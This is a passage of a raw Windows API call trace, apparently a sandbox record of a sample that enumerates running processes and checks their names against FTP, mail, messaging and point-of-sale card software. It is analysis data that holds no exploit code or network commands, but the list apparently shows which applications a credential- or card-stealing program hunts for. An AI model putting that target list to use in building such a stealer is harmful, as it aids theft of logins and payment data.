EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.954] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xa50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="power-more.exe") returned 0xe [0103.954] CloseHandle (hObject=0x4e4) returned 1 [0103.954] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x4e4 [0103.954] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.956] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x310000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="itself read.exe") returned 0xf [0103.956] CloseHandle (hObject=0x4e4) returned 1 [0103.956] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x4e4 [0103.956] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.957] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xb40000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="agreement.exe") returned 0xd [0103.957] CloseHandle (hObject=0x4e4) returned 1 [0103.957] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x4e4 [0103.957] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.958] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xf60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="water-week.exe") returned 0xe [0103.959] CloseHandle (hObject=0x4e4) returned 1 [0103.959] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x4e4 [0103.959] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.960] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xa10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="which_oil.exe") returned 0xd [0103.960] CloseHandle (hObject=0x4e4) returned 1 [0103.960] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x4e4 [0103.960] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.961] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x170000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="justopportunityacross.exe") returned 0x19 [0103.962] CloseHandle (hObject=0x4e4) returned 1 [0103.962] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x4e4 [0103.962] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.963] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x330000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="tax_work.exe") returned 0xc [0103.963] CloseHandle (hObject=0x4e4) returned 1 [0103.963] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x4e4 [0103.963] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.964] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x1050000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="receive former.exe") returned 0x12 [0103.964] CloseHandle (hObject=0x4e4) returned 1 [0103.964] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x4e4 [0103.964] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.966] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x8f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="office.exe") returned 0xa [0103.967] CloseHandle (hObject=0x4e4) returned 1 [0103.967] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x4e4 [0103.967] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.968] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x12d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="civil.exe") returned 0x9 [0103.968] CloseHandle (hObject=0x4e4) returned 1 [0103.968] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x4e4 [0103.968] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.969] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x3d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0103.970] CloseHandle (hObject=0x4e4) returned 1 [0103.970] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb50) returned 0x4e4 [0103.970] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.971] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x3b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0103.971] CloseHandle (hObject=0x4e4) returned 1 [0103.971] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x4e4 [0103.971] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.972] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x950000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0103.972] CloseHandle (hObject=0x4e4) returned 1 [0103.973] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x4e4 [0103.973] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.974] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x280000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0103.974] CloseHandle (hObject=0x4e4) returned 1 [0103.974] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb68) returned 0x4e4 [0103.974] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.975] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xfa0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0103.975] CloseHandle (hObject=0x4e4) returned 1 [0103.975] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x4e4 [0103.975] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.977] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xe0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0103.977] CloseHandle (hObject=0x4e4) returned 1 [0103.977] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x4e4 [0103.977] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.978] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x230000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0103.978] CloseHandle (hObject=0x4e4) returned 1 [0103.978] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb80) returned 0x4e4 [0103.978] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.979] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x860000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0103.980] CloseHandle (hObject=0x4e4) returned 1 [0103.980] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb88) returned 0x4e4 [0103.980] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.981] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xc40000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0103.981] CloseHandle (hObject=0x4e4) returned 1 [0103.981] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb90) returned 0x4e4 [0103.981] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.982] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x1230000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0103.983] CloseHandle (hObject=0x4e4) returned 1 [0103.983] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb98) returned 0x4e4 [0103.983] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.984] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x1280000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0103.984] CloseHandle (hObject=0x4e4) returned 1 [0103.984] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba0) returned 0x4e4 [0103.984] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.985] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xcd0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0103.985] CloseHandle (hObject=0x4e4) returned 1 [0103.985] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba8) returned 0x4e4 [0103.985] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.987] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xb50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0103.987] CloseHandle (hObject=0x4e4) returned 1 [0103.987] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb0) returned 0x4e4 [0103.987] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.988] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x10f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0103.988] CloseHandle (hObject=0x4e4) returned 1 [0103.988] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb8) returned 0x4e4 [0103.988] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.989] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xb70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0103.990] CloseHandle (hObject=0x4e4) returned 1 [0103.990] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc0) returned 0x4e4 [0103.990] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.991] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xae0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0103.991] CloseHandle (hObject=0x4e4) returned 1 [0103.991] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc8) returned 0x4e4 [0103.991] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.992] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xb70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0103.992] CloseHandle (hObject=0x4e4) returned 1 [0103.993] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd0) returned 0x4e4 [0103.993] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.994] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x1090000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0103.994] CloseHandle (hObject=0x4e4) returned 1 [0103.994] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd8) returned 0x4e4 [0103.994] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.995] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x1260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0103.995] CloseHandle (hObject=0x4e4) returned 1 [0103.995] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe0) returned 0x4e4 [0103.995] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.997] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xfc0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0103.997] CloseHandle (hObject=0x4e4) returned 1 [0103.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe8) returned 0x4e4 [0103.997] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.998] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xac0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0103.998] CloseHandle (hObject=0x4e4) returned 1 [0103.998] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf0) returned 0x4e4 [0103.998] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.999] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0104.000] CloseHandle (hObject=0x4e4) returned 1 [0104.000] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf8) returned 0x4e4 [0104.000] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.001] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xb30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0104.001] CloseHandle (hObject=0x4e4) returned 1 [0104.001] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f0) returned 0x4e4 [0104.001] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.002] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x960000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0104.003] CloseHandle (hObject=0x4e4) returned 1 [0104.003] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x4e4 [0104.003] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.004] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x11b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0104.004] CloseHandle (hObject=0x4e4) returned 1 [0104.004] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x4e4 [0104.004] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.005] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x370000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0104.006] CloseHandle (hObject=0x4e4) returned 1 [0104.006] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x4e4 [0104.006] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.007] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x11a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0104.007] CloseHandle (hObject=0x4e4) returned 1 [0104.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x4e4 [0104.007] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.008] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x11f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0104.009] CloseHandle (hObject=0x4e4) returned 1 [0104.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x4e4 [0104.009] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.010] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x230000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0104.010] CloseHandle (hObject=0x4e4) returned 1 [0104.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f8) returned 0x4e4 [0104.010] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.011] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x250000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0104.011] CloseHandle (hObject=0x4e4) returned 1 [0104.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x4e4 [0104.011] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.013] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xbf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0104.013] CloseHandle (hObject=0x4e4) returned 1 [0104.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x908) returned 0x4e4 [0104.013] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.014] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xe70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="point.exe") returned 0x9 [0104.014] CloseHandle (hObject=0x4e4) returned 1 [0104.015] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x4e4 [0104.015] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.016] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xae0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0104.016] CloseHandle (hObject=0x4e4) returned 1 [0104.016] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa94) returned 0x4e4 [0104.016] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.017] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xe60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0104.017] CloseHandle (hObject=0x4e4) returned 1 [0104.017] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4e4 [0104.017] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.018] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xed0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0104.019] CloseHandle (hObject=0x4e4) returned 1 [0104.019] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa4) returned 0x4e4 [0104.019] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.020] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xd80000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0104.020] CloseHandle (hObject=0x4e4) returned 1 [0104.020] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaac) returned 0x4e4 [0104.020] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.021] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xbd0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0104.022] CloseHandle (hObject=0x4e4) returned 1 [0104.022] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x4e4 [0104.022] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.024] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x8c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0104.025] CloseHandle (hObject=0x4e4) returned 1 [0104.025] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x4e4 [0104.025] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.026] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x9b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0104.026] CloseHandle (hObject=0x4e4) returned 1 [0104.026] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x4e4 [0104.026] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.027] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xd10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0104.027] CloseHandle (hObject=0x4e4) returned 1 [0104.028] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc08) returned 0x4e4 [0104.028] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.029] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xe60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0104.029] CloseHandle (hObject=0x4e4) returned 1 [0104.029] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc10) returned 0x4e4 [0104.030] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.031] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x1330000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0104.031] CloseHandle (hObject=0x4e4) returned 1 [0104.031] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc18) returned 0x4e4 [0104.031] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.033] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x11e0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0104.033] CloseHandle (hObject=0x4e4) returned 1 [0104.033] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc20) returned 0x4e4 [0104.033] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.034] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x110000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0104.035] CloseHandle (hObject=0x4e4) returned 1 [0104.035] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc44) returned 0x0 [0104.035] CloseHandle (hObject=0x0) returned 0 [0104.035] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0104.035] CloseHandle (hObject=0x0) returned 0 [0104.035] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xee4) returned 0x4e4 [0104.035] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, 